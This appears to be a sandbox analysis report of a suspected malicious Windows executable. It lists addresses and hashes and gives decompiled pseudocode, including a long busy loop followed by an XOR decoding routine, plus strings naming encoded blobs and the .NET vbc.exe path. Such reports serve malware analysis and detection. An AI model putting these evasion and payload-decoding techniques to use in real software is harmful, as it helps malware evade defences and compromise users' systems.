0x004035e3
0x004035ec
0x004035f5
0x004035fe
0x00403604
0x0040360a
0x0040360f
0x00403617
0x00403620
0x00403620
0x00403629
0x0040362f
0x00403635
0x0040363a
0x00403642
0x0040364b
0x0040364b
0x00403654
0x0040365a
0x00403660
0x00403665
0x0040366d
0x00403676
0x00403676
0x0040367f
0x00403685
0x0040368b
0x00403690
0x00403698
0x004036a1
0x004036a1
0x004036aa
0x004036b0
0x004036b6
0x004036bb
0x004036c3
0x004036cc
0x004036cc
0x004036d5
0x004036de
0x004036e7
0x004036ed
0x004036f3
0x004036f8
0x00403700
0x00403709
0x00403709
0x00403712
0x00403718
0x0040371e
0x00403723
0x0040372b
0x00403734
0x00403734
0x0040373d
0x00403743
0x00403749
0x0040374e
0x00403756
0x0040375f
0x0040375f
0x00403768
0x0040376e
0x00403774
0x00403779
0x00403781
0x0040378a
0x0040378a
0x00403793
0x00403799
0x0040379f
0x004037a4
0x004037ac
0x004037b5
0x004037b5
0x004037be
0x004037c7
0x004037d0
0x004037d6
0x004037dc
0x004037e1
0x004037e9
0x004037f2
0x004037f2
0x004037fb
0x00403801
0x00403807
0x0040380c
0x00403814
0x0040381d
0x0040381d
0x00403826
0x0040382c
0x00403832
0x00403837
0x0040383f
0x00403848
0x00403848
0x00403851
0x00403857
0x0040385d
0x00403862
0x0040386a
0x00403873
0x00403873
0x0040387c
0x00403882
0x00403888
0x0040388d
0x00403895
0x0040389e
0x0040389e
0x004038a3
0x004038a9
0x004038b0
0x004038b7
0x004038c9
0x004038d8
0x004038c3
0x004038c6
0x004038c6
0x004038e4
0x004038ea
0x004038f1
0x004038f8
0x00403905
0x00403908
0x00403915
0x0040391e
0x00403927
0x0040392d
0x00403933
0x00403938
0x00403940
0x00403949
0x00403949
0x00403952
0x00403958
0x0040395e
0x00403963
0x0040396b
0x00403974
0x00403974
0x0040397d
0x00403983
0x00403989
0x0040398e
0x00403996
0x0040399f
0x0040399f
0x004039a8
0x004039ae
0x004039b4
0x004039b9
0x004039c1
0x004039ca
0x004039ca
0x004039d3
0x004039d9
0x004039df
0x004039e4
0x004039ec
0x004039f5
0x004039f5
0x004039fe
0x00403a0a
0x00403a16
0x00403a22
0x00403a28
0x00403a2d
0x00403a35
0x00403a41
0x00403a41
0x00403a4d
0x00403a59
0x00403a5f
0x00403a64
0x00403a6c
0x00403a78
0x00403a78
0x00403a84
0x00403a90
0x00403a96
0x00403a9b
0x00403aa3
0x00403aaf
0x00403aaf
0x00403abb
0x00403ac7
0x00403acd
0x00403ad2
0x00403ada
0x00403ae6
0x00403ae6
0x00403af2
0x00403afe
0x00403b04
0x00403b09
0x00403b11
0x00403b1d
0x00403b1d
0x00403b29
0x00403b35
0x00403b41
0x00403b4d
0x00403b53
0x00403b58
0x00403b60
0x00403b6c
0x00403b6c
0x00403b78
0x00403b84
0x00403b8a
0x00403b8f
0x00403b97
0x00403ba3
0x00403ba3
0x00403baf
0x00403bbb
0x00403bc1
0x00403bc6
0x00403bce
0x00403bda
0x00403bda
0x00403be6
0x00403bf2
0x00403bf8
0x00403bfd
0x00403c05
0x00403c11
0x00403c11
0x00403c1d
0x00403c29
0x00403c2f
0x00403c34
0x00403c3c
0x00403c48
0x00403c48
0x00403c54
0x00403c5d
0x00403c66
0x00403c6c
0x00403c72
0x00403c77
0x00403c7f
0x00403c88
0x00403c88
0x00403c91
0x00403c97
0x00403c9d
0x00403ca2
0x00403caa
0x00403cb3
0x00403cb3
0x00403cbc
0x00403cc2
0x00403cc8
0x00403ccd
0x00403cd5
0x00403cde
0x00403cde
0x00403ce7
0x00403ced
0x00403cf3
0x00403cf8
0x00403d00
0x00403d09
0x00403d09
0x00403d12
0x00403d18
0x00403d1e
0x00403d23
0x00403d2b
0x00403d34
0x00403d34
0x00403d3d
0x00403d46
0x00403d4f
0x00403d55
0x00403d5b
0x00403d60
0x00403d68
0x00403d71
0x00403d71
0x00403d7a
0x00403d80
0x00403d86
0x00403d8b
0x00403d93
0x00403d9c
0x00403d9c
0x00403da5
0x00403dab
0x00403db1
0x00403db6
0x00403dbe
0x00403dc7
0x00403dc7
0x00403dd0
0x00403dd6
0x00403ddc
0x00403de1
0x00403de9
0x00403df2
0x00403df2
0x00403dfb
0x00403e01
0x00403e07
0x00403e0c
0x00403e14
0x00403e1d
0x00403e1d
0x00403e26
0x00403e32
0x00403e3e
0x00403e4a
0x00403e50
0x00403e55
0x00403e5d
0x00403e69
0x00403e69
0x00403e75
0x00403e81
0x00403e87
0x00403e8c
0x00403e94
0x00403ea0
0x00403ea0
0x00403eac
0x00403eb8
0x00403ebe
0x00403ec3
0x00403ecb
0x00403ed7
0x00403ed7
0x00403ee3
0x00403eef
0x00403ef5
0x00403efa
0x00403f02
0x00403f0e
0x00403f0e
0x00403f1a
0x00403f26
0x00403f2c
0x00403f31
0x00403f39
0x00403f45
0x00403f45
0x00403f51
0x00403f5a
0x00403f63
0x00403f69
0x00403f6f
0x00403f74
0x00403f7c
0x00403f85
0x00403f85
0x00403f8e
0x00403f94
0x00403f9a
0x00403f9f
0x00403fa7
0x00403fb0
0x00403fb0
0x00403fb9
0x00403fbf
0x00403fc5
0x00403fca
0x00403fd2
0x00403fdb
0x00403fdb
0x00403fe4
0x00403fea
0x00403ff0
0x00403ff5
0x00403ffd
0x00404006
0x00404006
0x0040400f
0x00404015
0x0040401b
0x00404020
0x00404028
0x00404031
0x00404031
0x0040403a
0x00404043
0x0040404c
0x00404052
0x00404058
0x0040405d
0x00404065
0x0040406e
0x0040406e
0x00404077
0x0040407d
0x00404083
0x00404088
0x00404090
0x00404099
0x00404099
0x004040a2
0x004040a8
0x004040ae
0x004040b3
0x004040bb
0x004040c4
0x004040c4
0x004040cd
0x004040d3
0x004040d9
0x004040de
0x004040e6
0x004040ef
0x004040ef
0x004040f8
0x004040fe
0x00404104
0x00404109
0x00404111
0x0040411a
0x0040411a
0x00404127
0x0040412f
0x00404132
0x00404153
0x00404167
0x00404184
0x00000000
0x00404186
0x0040418c

APIs

Sleep.KERNELBASE(00000000), ref: 004038A3

Strings

HlIVbkHc8U9zbBwO3ukTkIbVejxe1DfTO0PjmmPl9OT54V2BrQBKJkgwoxuq1LkNtzAbCNjb5vLKHlC0EzuWZJKNpQ, xrefs: 00404141
Y1Z1f0469GOQVOy8Fh4i54aGWYv4nsdPwhcgbTdetiwTl8tIqPp131NFy3xWJ602ygWwjiGgRB6k3P85rwL2Anbuk0, xrefs: 00404162
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, xrefs: 00404176

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$HlIVbkHc8U9zbBwO3ukTkIbVejxe1DfTO0PjmmPl9OT54V2BrQBKJkgwoxuq1LkNtzAbCNjb5vLKHlC0EzuWZJKNpQ$Y1Z1f0469GOQVOy8Fh4i54aGWYv4nsdPwhcgbTdetiwTl8tIqPp131NFy3xWJ602ygWwjiGgRB6k3P85rwL2Anbuk0
API String ID: 3472027048-4005014725
Opcode ID: 6cb191e6aa9930cfe244bb1a7269221a3119333861f0e005c97865ab31ee8568
Instruction ID: ae8d78249f699baa436c87a931e435895df9cc353ee060a78b5c40b9619d50b0
Opcode Fuzzy Hash: 6cb191e6aa9930cfe244bb1a7269221a3119333861f0e005c97865ab31ee8568
Instruction Fuzzy Hash: 3CA21A70A02119DBDB548F85FA882E9BF35FB85351F9281A5D1C4360ADCBB815B2CF1E

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 1.8, APIs: 1, Instructions: 535
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00401000(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long _v44;
				signed int _v48;
				char _v49;
				char _v50;
				signed char _t289;
				signed int _t299;

				_t289 = __eax;
				_v16 = 0;
				_v28 =  *0x410538;
				_v28 =  *0x410534;
				_v28 =  *0x410530;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((__eax & 0x00000044) == 0) {
					_v28 =  *0x410524;
					_v28 =  *0x410520;
				}
				_v28 =  *0x41051c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v28 =  *0x410518;
					_v28 =  *0x410514;
				}
				_v28 =  *0x410510;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v28 =  *0x41050c;
					_v28 =  *0x410508;
				}
				_v28 =  *0x410504;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v28 =  *0x410500;
					_v28 =  *0x4104fc;
				}
				_v28 =  *0x4104f8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v28 =  *0x4104f4;
					_v28 =  *0x4104f0;
				}
				_v36 =  *0x4104ec;
				_v36 =  *0x4104e8;
				_v36 =  *0x4104e4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v36 =  *0x4104e0;
					_v36 =  *0x4104dc;
				}
				_v36 =  *0x4104d8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v36 =  *0x4104d4;
					_v36 =  *0x4104d0;
				}
				_v36 =  *0x4104cc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v36 =  *0x4104c8;
					_v36 =  *0x4104c4;
				}
				_v36 =  *0x4104c0;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v36 =  *0x4104bc;
					_v36 =  *0x4104b8;
				}
				_v36 =  *0x4104b4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v36 =  *0x4104b0;
					_v36 =  *0x4104ac;
				}
				_v12 =  *0x4104a8;
				_v12 =  *0x4104a4;
				_v12 =  *0x4104a0;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v12 =  *0x41049c;
					_v12 =  *0x410498;
				}
				_v12 =  *0x410494;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v12 =  *0x410490;
					_v12 =  *0x41048c;
				}
				_v12 =  *0x410488;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v12 =  *0x410484;
					_v12 =  *0x410480;
				}
				_v12 =  *0x41047c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v12 =  *0x410478;
					_v12 =  *0x410474;
				}
				_v12 =  *0x410470;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v12 =  *0x41046c;
					_v12 =  *0x410468;
				}
				_v40 =  *0x410464;
				_v40 =  *0x410460;
				_v40 =  *0x41045c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v40 =  *0x410458;
					_v40 =  *0x410454;
				}
				_v40 =  *0x410450;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v40 =  *0x41044c;
					_v40 =  *0x410448;
				}
				_v40 =  *0x410444;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v40 =  *0x410440;
					_v40 =  *0x41043c;
				}
				_v40 =  *0x410438;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v40 =  *0x410434;
					_v40 =  *0x410430;
				}
				_v40 =  *0x41042c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v40 =  *0x410428;
					_v40 =  *0x410424;
				}
				_v24 =  *0x410420;
				_v24 =  *0x41041c;
				_v24 =  *0x410418;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v24 =  *0x410414;
					_v24 =  *0x410410;
				}
				_v24 =  *0x41040c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v24 =  *0x410408;
					_v24 =  *0x410404;
				}
				_v24 =  *0x410400;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v24 =  *0x4103fc;
					_v24 =  *0x4103f8;
				}
				_v24 =  *0x4103f4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v24 =  *0x4103f0;
					_v24 =  *0x4103ec;
				}
				_v24 =  *0x4103e8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v24 =  *0x4103e4;
					_v24 =  *0x4103e0;
				}
				_v8 =  *0x4103dc;
				_v8 =  *0x4103d8;
				_v8 =  *0x4103d4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v8 =  *0x4103d0;
					_v8 =  *0x4103cc;
				}
				_v8 =  *0x4103c8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v8 =  *0x4103c4;
					_v8 =  *0x4103c0;
				}
				_v8 =  *0x4103bc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v8 =  *0x4103b8;
					_v8 =  *0x4103b4;
				}
				_v8 =  *0x4103b0;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v8 =  *0x4103ac;
					_v8 =  *0x4103a8;
				}
				_v8 =  *0x4103a4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v8 =  *0x4103a0;
					_v8 =  *0x41039c;
				}
				_v20 =  *0x410398;
				_v20 =  *0x410394;
				_v20 =  *0x410390;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v20 =  *0x41038c;
					_v20 =  *0x410388;
				}
				_v20 =  *0x410384;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v20 =  *0x410380;
					_v20 =  *0x41037c;
				}
				_v20 =  *0x410378;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v20 =  *0x410374;
					_v20 =  *0x410370;
				}
				_v20 =  *0x41036c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v20 =  *0x410368;
					_v20 =  *0x410364;
				}
				_v20 =  *0x410360;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v20 =  *0x41035c;
					_v20 =  *0x410358;
				}
				_v32 =  *0x410354;
				_v32 =  *0x410350;
				_v32 =  *0x41034c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v32 =  *0x410348;
					_v32 =  *0x410344;
				}
				_v32 =  *0x410340;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v32 =  *0x41033c;
					_v32 =  *0x410338;
				}
				_v32 =  *0x410334;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v32 =  *0x410330;
					_v32 =  *0x41032c;
				}
				_v32 =  *0x410328;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v32 =  *0x410324;
					_v32 =  *0x410320;
				}
				_v32 =  *0x41031c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v32 =  *0x410318;
					_v32 =  *0x410314;
				}
				_v44 = 0;
				_v16 = 0;
				while(_v16 < 0x5f5e100) {
					_v44 = _v44 + 1;
					_t289 = _v16 + 1;
					_v16 = _t289;
				}
				if(_v44 == 0x5f5e100) {
					_v48 = 0;
					while(1) {
						_t289 = _v48;
						if(_t289 >= _a12) {
							goto L91;
						}
						Sleep(0); // executed
						_t299 = _v48 & 0x80000003;
						if(_t299 < 0) {
							_t299 = (_t299 - 0x00000001 | 0xfffffffc) + 1;
						}
						_v50 =  *(_a4 + _t299) ^  *(_a8 + _v48);
						_v49 =  *(_a8 + _v48);
						 *(_a8 + _v48) = _v50 + _v49;
						 *(_a8 + _v48) =  *(_a8 + _v48) - _v49;
						_v48 = _v48 + 1;
					}
				}
				L91:
				return _t289;
			}

0x00401000
0x00401006
0x00401013
0x0040101c
0x00401025
0x0040102b
0x00401031
0x00401036
0x0040103e
0x00401047
0x00401047
0x00401050
0x00401056
0x0040105c
0x00401061
0x00401069
0x00401072
0x00401072
0x0040107b
0x00401081
0x00401087
0x0040108c
0x00401094
0x0040109d
0x0040109d
0x004010a6
0x004010ac
0x004010b2
0x004010b7
0x004010bf
0x004010c8
0x004010c8
0x004010d1
0x004010d7
0x004010dd
0x004010e2
0x004010ea
0x004010f3
0x004010f3
0x004010fc
0x00401105
0x0040110e
0x00401114
0x0040111a
0x0040111f
0x00401127
0x00401130
0x00401130
0x00401139
0x0040113f
0x00401145
0x0040114a
0x00401152
0x0040115b
0x0040115b
0x00401164
0x0040116a
0x00401170
0x00401175
0x0040117d
0x00401186
0x00401186
0x0040118f
0x00401195
0x0040119b
0x004011a0
0x004011a8
0x004011b1
0x004011b1
0x004011ba
0x004011c0
0x004011c6
0x004011cb
0x004011d3
0x004011dc
0x004011dc
0x004011e5
0x004011ee
0x004011f7
0x004011fd
0x00401203
0x00401208
0x00401210
0x00401219
0x00401219
0x00401222
0x00401228
0x0040122e
0x00401233
0x0040123b
0x00401244
0x00401244
0x0040124d
0x00401253
0x00401259
0x0040125e
0x00401266
0x0040126f
0x0040126f
0x00401278
0x0040127e
0x00401284
0x00401289
0x00401291
0x0040129a
0x0040129a
0x004012a3
0x004012a9
0x004012af
0x004012b4
0x004012bc
0x004012c5
0x004012c5
0x004012ce
0x004012d7
0x004012e0
0x004012e6
0x004012ec
0x004012f1
0x004012f9
0x00401302
0x00401302
0x0040130b
0x00401311
0x00401317
0x0040131c
0x00401324
0x0040132d
0x0040132d
0x00401336
0x0040133c
0x00401342
0x00401347
0x0040134f
0x00401358
0x00401358
0x00401361
0x00401367
0x0040136d
0x00401372
0x0040137a
0x00401383
0x00401383
0x0040138c
0x00401392
0x00401398
0x0040139d
0x004013a5
0x004013ae
0x004013ae
0x004013b7
0x004013c0
0x004013c9
0x004013cf
0x004013d5
0x004013da
0x004013e2
0x004013eb
0x004013eb
0x004013f4
0x004013fa
0x00401400
0x00401405
0x0040140d
0x00401416
0x00401416
0x0040141f
0x00401425
0x0040142b
0x00401430
0x00401438
0x00401441
0x00401441
0x0040144a
0x00401450
0x00401456
0x0040145b
0x00401463
0x0040146c
0x0040146c
0x00401475
0x0040147b
0x00401481
0x00401486
0x0040148e
0x00401497
0x00401497
0x004014a0
0x004014a9
0x004014b2
0x004014b8
0x004014be
0x004014c3
0x004014cb
0x004014d4
0x004014d4
0x004014dd
0x004014e3
0x004014e9
0x004014ee
0x004014f6
0x004014ff
0x004014ff
0x00401508
0x0040150e
0x00401514
0x00401519
0x00401521
0x0040152a
0x0040152a
0x00401533
0x00401539
0x0040153f
0x00401544
0x0040154c
0x00401555
0x00401555
0x0040155e
0x00401564
0x0040156a
0x0040156f
0x00401577
0x00401580
0x00401580
0x00401589
0x00401592
0x0040159b
0x004015a1
0x004015a7
0x004015ac
0x004015b4
0x004015bd
0x004015bd
0x004015c6
0x004015cc
0x004015d2
0x004015d7
0x004015df
0x004015e8
0x004015e8
0x004015f1
0x004015f7
0x004015fd
0x00401602
0x0040160a
0x00401613
0x00401613
0x0040161c
0x00401622
0x00401628
0x0040162d
0x00401635
0x0040163e
0x0040163e
0x00401647
0x0040164d
0x00401653
0x00401658
0x00401660
0x00401669
0x00401669
0x00401672
0x0040167b
0x00401684
0x0040168a
0x00401690
0x00401695
0x0040169d
0x004016a6
0x004016a6
0x004016af
0x004016b5
0x004016bb
0x004016c0
0x004016c8
0x004016d1
0x004016d1
0x004016da
0x004016e0
0x004016e6
0x004016eb
0x004016f3
0x004016fc
0x004016fc
0x00401705
0x0040170b
0x00401711
0x00401716
0x0040171e
0x00401727
0x00401727
0x00401730
0x00401736
0x0040173c
0x00401741
0x00401749
0x00401752
0x00401752
0x00401755
0x0040175c
0x0040176e
0x0040177d
0x00401768
0x0040176b
0x0040176b
0x00401789
0x0040178b
0x0040179d
0x0040179d
0x004017a3
0x00000000
0x00000000
0x004017a7
0x004017b0
0x004017b6
0x004017bc
0x004017bc
0x004017cf
0x004017da
0x004017ed
0x00401804
0x0040179a
0x0040179a
0x0040179d
0x0040180b
0x0040180b

APIs

Sleep.KERNELBASE(00000000), ref: 004017A7

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: cbbdee7d66fff18f73273809d84ff5875232b1400deb19837868d88d062be91f
Instruction ID: 3dcbd18372068460e6475b0380a7039c1ad69d22092d06fc819076d4860fefe5
Opcode Fuzzy Hash: cbbdee7d66fff18f73273809d84ff5875232b1400deb19837868d88d062be91f
Instruction Fuzzy Hash: 74323A70A02119DBDB408F85FA882EDBF71FB85351FA281A5D6D4320A9C7B915B1CF1E

Uniqueness

Uniqueness Score: -1.00%

Function 00408887 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00408887(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x436624 = _t6;
				if(_t6 != 0) {
					 *0x436c28 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040889c
0x004088a2
0x004088a9
0x004088b0
0x004088b6
0x004088ac
0x004088ac
0x004088ac

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040889C

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: f8628a71425785cc8b511b0acae68f1946e2cd0d83e5d17cd9e08670f85985e0
Instruction ID: 946298031776be1fb2b6c04d64fef2db7703f301b6f35f52b9779af8e7c1db91
Opcode Fuzzy Hash: f8628a71425785cc8b511b0acae68f1946e2cd0d83e5d17cd9e08670f85985e0
Instruction Fuzzy Hash: B2D05E326503456AEB005F74BD09B663FDCD788395F11C436B94DC6190EA74C5808548

Uniqueness

Uniqueness Score: -1.00%

Function 0040835C Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040835C() {
				void* _t1;

				_t1 = E004082EA(0); // executed
				return _t1;
			}

0x0040835e
0x00408364

APIs

__encode_pointer.LIBCMT ref: 0040835E

Part of subcall function 004082EA: TlsGetValue.KERNEL32(00000000,?,00408363,00000000,0040AA43,004361F0,00000000,00000314,?,00407A0B,004361F0,Microsoft Visual C++ Runtime Library,00012010), ref: 004082FC
Part of subcall function 004082EA: TlsGetValue.KERNEL32(00000006,?,00408363,00000000,0040AA43,004361F0,00000000,00000314,?,00407A0B,004361F0,Microsoft Visual C++ Runtime Library,00012010), ref: 00408313
Part of subcall function 004082EA: RtlEncodePointer.NTDLL(00000000,?,00408363,00000000,0040AA43,004361F0,00000000,00000314,?,00407A0B,004361F0,Microsoft Visual C++ Runtime Library,00012010), ref: 00408351

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 9774d9e80c7fc8b6c23f9f5a3cb2c13bedee26ccc3b3f8ae3e60797bbf9d8d08
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A0C4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040A0C4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x435a80; // 0xa4dadcfd
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x436928 = _t6;
				 *0x436924 = _t22;
				 *0x436920 = _t25;
				 *0x43691c = _t21;
				 *0x436918 = _t27;
				 *0x436914 = _t26;
				 *0x436940 = ss;
				 *0x436934 = cs;
				 *0x436910 = ds;
				 *0x43690c = es;
				 *0x436908 = fs;
				 *0x436904 = gs;
				asm("pushfd");
				_pop( *0x436938);
				 *0x43692c =  *_t31;
				 *0x436930 = _v0;
				 *0x43693c =  &_a4;
				 *0x436878 = 0x10001;
				_t11 =  *0x436930; // 0x0
				 *0x43682c = _t11;
				 *0x436820 = 0xc0000409;
				 *0x436824 = 1;
				_t12 =  *0x435a80; // 0xa4dadcfd
				_v812 = _t12;
				_t13 =  *0x435a84; // 0x5b252302
				_v808 = _t13;
				 *0x436870 = IsDebuggerPresent();
				_push(1);
				E0040C800(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(" hC");
				if( *0x436870 == 0) {
					_push(1);
					E0040C800(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040a0c4
0x0040a0c4
0x0040a0c4
0x0040a0c4
0x0040a0c4
0x0040a0c4
0x0040a0c4
